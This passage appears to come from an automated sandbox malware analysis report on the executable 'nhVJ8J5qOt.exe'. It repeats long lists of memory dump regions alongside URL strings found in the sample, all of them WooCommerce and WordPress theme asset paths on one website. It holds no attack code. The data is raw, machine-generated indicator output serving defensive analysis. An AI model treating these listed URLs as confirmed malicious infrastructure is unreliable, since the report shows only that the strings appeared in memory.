00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/compatibility/elementor/elementor-global.min.cs
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/css/main.min.css?ver=9.12.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 